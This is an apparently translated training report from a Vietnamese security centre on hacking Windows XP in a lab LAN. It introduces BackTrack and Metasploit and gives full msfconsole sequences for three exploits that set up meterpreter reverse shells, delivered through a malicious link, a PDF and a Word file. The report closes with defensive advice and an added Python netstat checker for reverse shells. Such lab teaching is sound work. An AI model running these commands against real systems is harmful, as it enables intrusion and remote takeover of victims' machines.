Athena Internship Final Report - Hoàng Thanh Quý

  • 1. TOPIC: SYSTEM HACKING. Student: HOÀNG THANH QUÝ
    INTRODUCTION
    According to statistics from Bkav, from the beginning of 2013 until now 2,405 websites of agencies and businesses in Vietnam have been broken into, an average of about 300 websites attacked each month. Mr. Vũ Ngọc Sơn, Vice President in charge of Research and Development at Bkav, said that agencies and businesses have been hit at almost every level, from minor to serious and very serious (aimed at stealing confidential documents), and that this malware has targeted the Ministry of Public Security, the Ministry of Defense, banks, research institutions and businesses. In Bkav's assessment, there have been deliberate campaigns to attack and spread malware in Vietnam. Network attacks and intrusions into information technology systems are carried out for espionage, profit, data destruction, theft of assets and unfair competition; these and other digital information security incidents are increasing at an alarming rate in number, are more varied in form and are more sophisticated in technology.
    In response, alongside the issuance of Directive 897/CT-TTg, the Prime Minister instructed ministries, sectors and localities to strengthen measures for ensuring digital information security. The Prime Minister also stated that the digital information security situation in our country has recently become complicated, with many threats that seriously endanger the application of information technology to socio-economic development and to national defense and security.
    This report gives a general introduction to the methods hackers use to attack, break into and exploit versions of the Windows operating system, the most widely used operating system in Vietnam today. It aims to help us understand how hackers work and to offer solutions that keep each user's information safe and secure in the Internet age.
    Hoàng Thanh Quý.
  • 2. ACKNOWLEDGMENTS
    To carry out and complete this project, I would first like to thank Mr. Võ Đỗ Thắng, the instructor supervising interns at the ATHENA International Center for Network Administration and Network Security Training, for his dedicated guidance over this period. I would also like to thank the colleagues and friends who shared their experience and made it possible for me to complete this project.
    Mistakes were unavoidable in the course of this project. I hope the teachers at the ATHENA center and my friends will give frank feedback so that I can learn from it in later study and development work.
    Hoàng Thanh Quý.
  • 3. PART 1: INTRODUCTION
    1.1 System hacking and the network security situation in Vietnam
    System hacking covers the techniques for obtaining usernames and passwords through software installed on the system, or through the ease with which remote services of the Windows operating system can be installed and run. It also covers escalating privileges on the system, using keyloggers to collect information, and deleting system log files. Once inside a system, a hacker can do anything on that computer, with extremely serious consequences for individuals and organizations.
    1.2 Vulnerabilities commonly exploited in the Windows operating system
    Computer software today is extremely complex and consists of thousands of lines of code. Software is written by people, so it is no surprise that it contains programming errors, known as vulnerabilities. Hackers use these vulnerabilities to break into systems, and malware authors use them to start their programs automatically on your computer.
    More and more security vulnerabilities are being discovered in operating systems, web servers and other software. Vendors keep track of these vulnerabilities and release new versions after patching the flaws of earlier ones. Users therefore have to stay informed and upgrade the old versions they are running; otherwise hackers will take advantage of this to attack the system. The forums of well-known vendors regularly publish security vulnerabilities, and how those vulnerabilities are exploited depends on the individual.
    Microsoft makes significant security improvements with each new version of Windows. The fact remains that network threats are developing faster than Microsoft's cycle of operating system updates and renewal.
    Cybercriminals commonly use vulnerabilities in program code to gain access to data and resources on the vulnerable computer.
  • 4. Malicious programs designed specifically to exploit these vulnerabilities, a technique known as an exploit, are spreading rapidly. Microsoft products that frequently have security vulnerabilities include the Windows operating system, Internet Explorer, Windows Server, Microsoft Exchange and the .NET Framework.
    1.3 The process of attacking a system
    We first look at the attack process in general. The target in front of us is a computer system. The steps for attacking it and taking it down can be listed as in the accompanying figure. There are 6 stages:
      Enumerate: extract all available information about the users on the system. SNMP probing is used to obtain more useful and more accurate information.
  • 5.   Crack: this is probably the stage that attracts hackers the most. It requires cracking a user's login password. Whatever the method, the goal to reach is access to the system.
      Escalate: put simply, moving from the access limits of a normal user to admin, or to a user with privileges high enough for the attack.
      Execute: run applications on the target machine. Malware, keyloggers and rootkits are prepared in advance to be run on the attacked computer.
      Hide: executable files, source code files and the like must be hidden so that the target does not detect and remove them.
      Tracks: naturally this does not mean leaving tracks. Information related to you must be wiped clean, leaving nothing behind; otherwise the chance of being identified as the intruder is very high.
    In summary, system hacking is the step that follows the survey and information-gathering phase, in which techniques such as footprinting, social engineering, enumeration and Google hacking are applied to find information about the target. Once the target system has been identified, the actual attack on the system begins. Different techniques have to be applied to get into that system and carry out the intended actions, such as deleting data or running a trojan or keylogger.
  • 6. PART 2: USING BACKTRACK FOR EXPLOITATION AND INTRUSION IN A LAN
    2.1 The Backtrack 5 R3 operating system
    Backtrack is a Linux distribution in Live DVD form, developed for penetration testing. Backtrack is the merger of 3 different Linux penetration testing distributions: IWHAX, WHOPPIX and Auditor. In its current version (5), Backtrack is based on the Ubuntu 11.10 Linux distribution.
    Backtrack has a fairly long development history across several Linux distributions. The current version uses the Slackware Linux distribution (Tomas M. (www.slax.org)). Backtrack continuously updates its tools and drivers. Backtrack currently has more than 300 tools for security research. Backtrack is a combination of 2 very well-known security testing toolsets, Whax and Auditor.
    Backtrack 5 contains a number of tools that can be used during a penetration test. The penetration testing tools in Backtrack 5 can be grouped as follows:
      Information gathering: tools for obtaining information related to a target, such as DNS, routing, e-mail addresses, websites, mail servers and so on. This information is collected from what is already available on the Internet, without touching the target environment.
      Network mapping: tools for checking which hosts are alive, obtaining information about the OS and applications used by the target, and port scanning.
      Vulnerability identification: tools for scanning for vulnerabilities (general) and for vulnerabilities in Cisco devices. It also contains tools for working with and analyzing Server Message Block (SMB) and Simple Network Management Protocol (SNMP).
  • 7.   Web application analysis: tools for tracking and monitoring web applications.
      Radio network analysis: tools for testing wireless networks, Bluetooth and radio-frequency identification (RFID).
      Penetration: tools for exploiting the vulnerabilities found on target machines.
      Privilege escalation: after exploiting vulnerabilities and gaining access to target machines, the tools in this category are used to raise our privileges to the highest level.
      Maintaining access: tools that help keep access to target machines. The highest privileges may be needed before the tools for maintaining access can be installed.
      Voice over IP (VoIP): tools for analyzing VoIP.
      Digital forensics: tools for forensic analysis, such as acquiring hard disk images, examining file structures and analyzing disk images. To use the tools in this category, choose Start Backtrack Forensics in the boot menu. It is sometimes necessary to mount the internal hard disk and swap files in read-only mode to preserve integrity.
      Reverse engineering: tools for debugging a program or disassembling an executable file.
    Backtrack 5 can be downloaded from: www.backtracklinux.org/downloads/
  • 8. 2.2 Metasploit
    Metasploit is a computer security project that provides information about security vulnerabilities and supports penetration testing and the development of network intrusion detection systems. The Metasploit Framework is an environment for testing, attacking and exploiting flaws in services. Metasploit is built in the object-oriented language Perl, with components written in C, assembler and Python. Metasploit runs on most operating systems: Linux, Windows, MacOS. The program can be downloaded from www.metasploit.com.
    Metasploit offers several user interfaces:
      Console interface: started with the msfconsole command. Msfconsole uses command lines for configuration and testing, so it is faster and more flexible.
      Web interface: msfweb, which interacts with the user through a web interface.
      Command line interface: msfcli.
    Metasploit environment:
      Global environment: managed with the two commands setg and unsetg. Options set here are global and are applied to all exploit modules.
      Temporary environment: managed with the two commands set and unset. This environment applies only to the exploit module currently loaded and does not affect other exploit modules.
    The configured environment can be stored with the save command. It is saved in ./msf/config and loaded again when the user interface starts.
    Using the Metasploit Framework:
    a) Select an exploit module: choose the vulnerable program or service that Metasploit supports.
        show exploits: list the exploit modules the framework supports.
        use exploit_name: select an exploit module.
  • 9.     info exploit_name: show information about an exploit module.
    The service flaws and modules should be updated regularly from www.metasploit.com, with the msfupdate command, or with svn update /opt/metasploit/msf3/.
    b) Configure the selected exploit module:
        show options: determine which options need to be configured.
        set: configure the options of that module.
      Some modules also have advanced options, which can be viewed with the command show advanced.
    c) Verify the options just configured:
        check: check whether the options have been set correctly.
    d) Select a target:
        show targets: the targets provided by that module.
        set: specify which target to use.
    e) Select a payload:
        show payloads: list the payloads of the current exploit module.
        info payload_name: show detailed information about that payload.
        set payload payload_name: specify the payload module name. After selecting a payload, use show options to see that payload's options.
        show advanced: show that payload's advanced options.
    g) Run the exploit:
        exploit: the command used to execute the payload code. The payload then provides information about the exploited system.
  • 10. 2.3 Overview of the LAN
    In an internal LAN, computers are usually connected to each other over short physical distances, such as within a room, a floor, a building or a company. Computers in a LAN can share resources with each other, typically files, printers, scanners and some other devices. A computer inside the LAN can use network scanning programs to learn the IP addresses of the hosts on the network.
    Nmap (Network Mapper) is a free, open-source utility for network discovery and security auditing. Nmap and Zenmap (the graphical front end for nmap) come preinstalled in BackTrack. They use IP packets to determine which hosts are available on the network, which services (application name and version) those hosts offer, which operating system (and version) they run, which type of packet filter or firewall is in use, and many other characteristics. Nmap runs on all operating systems, and official binary packages are available for Linux, Windows and Mac OS X.
    Once the hosts on the network have been identified, system vulnerability scanners can be used to find the vulnerabilities of the system to be broken into, and from there to exploit them and gain access
  • 11. to the system. One such scanner is Nessus, downloadable from http://www.nessus.org/.
    Once the intrusion has succeeded and full control of the system has been taken, the hacker can do anything on the victim's machine, such as downloading and uploading files, changing the system structure, running programs, stealing passwords and installing trojans or backdoors.
    2.4 Intrusion and exploitation of Windows XP
    2.4.1 Vulnerability used: Ms12_004
    Start msfconsole from a BackTrack terminal window. Declare the vulnerability to use and set the options:
        search ms12_004
        use exploit/windows/browser/ms12_004_midi
        show options
        set SRVHOST 192.168.159.128
        set PAYLOAD windows/meterpreter/reverse_tcp
        set LHOST 192.168.159.128
        exploit
  • 12. BackTrack creates a link containing the malicious code (http://192.168.159.128:4444). As soon as the victim clicks the link, BackTrack automatically sends the malicious code to the victim's machine, after which the victim machine's information can be viewed and control of it taken.
    Exploitation is carried out against the victim machine with IP 192.168.159.130, port 1078.
  • 13.     sessions
        sessions -i 1
        getuid
        sysinfo
    Hacked: the ms12_004 flaw was exploited successfully on WinXP SP2.
    Victim:
        Computer: QUYDONGN 3B5D9F.
        OS: Windows XP (Build 2600. Service Pack 2).
        Architecture: x86.
        System language: en US.
        Meterpreter: x86/win32.
  • 14. 2.4.2 Vulnerability used through a PDF file
    Start msfconsole from a BackTrack terminal window. Declare the vulnerability to use and set the options:
        search nojs
        use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
        show options
        set FILENAME hack.pdf
        set payload windows/meterpreter/reverse_tcp
        set LHOST 192.168.136.128
        set LPORT 4444
        exploit
    Backtrack reports that the file hack.pdf was created successfully in the directory /root/ms4/local/.
        use multi/handler
        set payload windows/meterpreter/reverse_tcp
  • 15.     set LHOST 192.168.136.128
        exploit
    Backtrack reports that it is ready for the attack. The hack.pdf file created earlier is then sent to the victim. If the victim opens hack.pdf, Backtrack sends the malicious code to the victim's machine to collect information and take control of it.
  • 16. Backtrack reports 1 session: the machine that opened hack.pdf has IP address 192.168.136.128, port 1037, and the malicious code file (752128) has been sent to the victim's machine. Next, the victim machine's information is checked:
        sysinfo
  • 17. Hacked: exploitation through the PDF file flaw succeeded on WinXP SP2.
    Victim:
        Computer: HUUANHH 9091FB1.
        OS: Windows XP (Build 2600. Service Pack 2).
        Architecture: x86.
        System language: en US.
        Meterpreter: x86/win32.
    2.4.3 Vulnerability used through a Word 2007 file
    Start msfconsole from a BackTrack terminal window. Declare the vulnerability to use and set the options:
        search ms12_027
        use exploit/windows/fileformat/ms12_027_mscomctl_bof
        show options
        set FILENAME hack.doc
        set payload windows/meterpreter/reverse_tcp
        set LHOST 192.168.1.104
        exploit
  • 18. Backtrack reports that the file hack.pdf was created successfully in the directory /root/ms4/local/.
        use exploit/multi/handler
        set payload windows/meterpreter/reverse_tcp
        set LHOST 192.168.1.104
        exploit
  • 19. Backtrack reports that it is ready for the attack. The hack.doc file created earlier is then sent to the victim. If the victim opens hack.doc, Backtrack sends the malicious code to the victim's machine to collect information and take control of it.
  • 20. Backtrack reports 1 session: the machine that opened hack.doc has IP address 192.168.1.104, port 4444, and the malicious code file (752128) has been sent to the victim's machine. Next, the victim machine's information is checked:
        sysinfo
    Hacked: exploitation through the Word 2007 file flaw succeeded on WinXP SP2.
    Victim:
        Computer: QUYDONGN 3B5D9F.
        OS: Windows XP (Build 2600. Service Pack 2).
        Architecture: x86.
        System language: en US.
        Meterpreter: x86/win32.
  • 21. PART 3: CONCLUSION
    For system attacks that rely on mistakes made while using the computer or on physical security flaws, the following measures reduce and prevent password theft by hackers:
      Passwords must be longer than 8 characters and must combine uppercase letters, lowercase letters, digits and special characters, so that cracking programs have difficulty guessing them.
      Configure the registry so that passwords on Windows systems are hashed and stored only in NTLM form, which makes them harder for such programs to recover. Set the following key to 1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash.
      The Admin user should delete the sam file in the Windows/repair directory after every data backup made with rdisk.
    When using the computer to access the Internet, users should note the following:
      Do not open e-mail attachments whose origin is unclear or untrusted.
      Make sure a firewall is installed and turned on for your system.
      Make sure Windows is updated regularly and that your security software has a "live" update function (automatic online updates).
    Microsoft has built a set of tools into Windows so that administrators and experienced users can analyze their computer to see whether it has been compromised. When users suspect an intrusion, they can use these tools to check their own computer for suspicious signs: WMIC, the net command, Openfiles, Netstat, Find.
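Added example, not part of the original report: the conclusion names Netstat as a self-check tool, and a meterpreter/reverse_tcp session like the one in section 2.4.1 appears on the victim as an established outbound TCP connection (192.168.159.130:1078 to 192.168.159.128:4444 in that lab). The Python code below parses `netstat -ano` output and returns such connections with their PID. The sample text, the PIDs and the expected-port list are constructed assumptions.

```python
import ipaddress

# Remote ports this workstation is expected to use (assumption; tune per site).
EXPECTED_REMOTE_PORTS = frozenset({53, 80, 443, 445})

def split_endpoint(endpoint):
    """Split '10.0.0.5:4444' or '[fe80::1%4]:445' into (host, port)."""
    host, _, port = endpoint.rpartition(":")
    host = host.strip("[]").split("%")[0]
    ipaddress.ip_address(host)  # raises ValueError for '*', names, garbage
    return host, int(port)

def parse_netstat(text):
    """Yield one dict per TCP row of `netstat -ano` output."""
    for line in text.splitlines():
        fields = line.split()
        # TCP rows have 5 columns; headers, blanks and UDP rows (4) are skipped.
        if len(fields) != 5 or fields[0].upper() != "TCP":
            continue
        try:
            local, remote = split_endpoint(fields[1]), split_endpoint(fields[2])
            pid = int(fields[4])
        except ValueError:
            continue  # truncated or malformed row
        yield {"local": local, "remote": remote, "state": fields[3], "pid": pid}

def suspicious_connections(text, expected=EXPECTED_REMOTE_PORTS):
    """Established sessions to a non-loopback host on an unexpected remote port."""
    hits = []
    for conn in parse_netstat(text):
        host, port = conn["remote"]
        if conn["state"] != "ESTABLISHED" or port in expected:
            continue
        # Skip local IPC, and local service ports (< 1024) answering a client.
        if ipaddress.ip_address(host).is_loopback or conn["local"][1] < 1024:
            continue
        hits.append(conn)
    return hits

# Constructed sample shaped like `netstat -ano` output on the lab victim.
SAMPLE = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       936
  TCP    192.168.159.130:1065   192.168.159.1:445      ESTABLISHED     4
  TCP    192.168.159.130:1078   192.168.159.128:4444   ESTABLISHED     1820
  TCP    127.0.0.1:1030         127.0.0.1:5152         ESTABLISHED     1404
  TCP    [::]:135               [::]:0                 LISTENING       936
  UDP    0.0.0.0:445            *:*                                    4
"""
```

Calling `suspicious_connections(SAMPLE)` returns only the row for PID 1820. On a real host the returned PID can then be resolved to an executable with WMIC, for example `wmic process where processid=1820 get name,executablepath`.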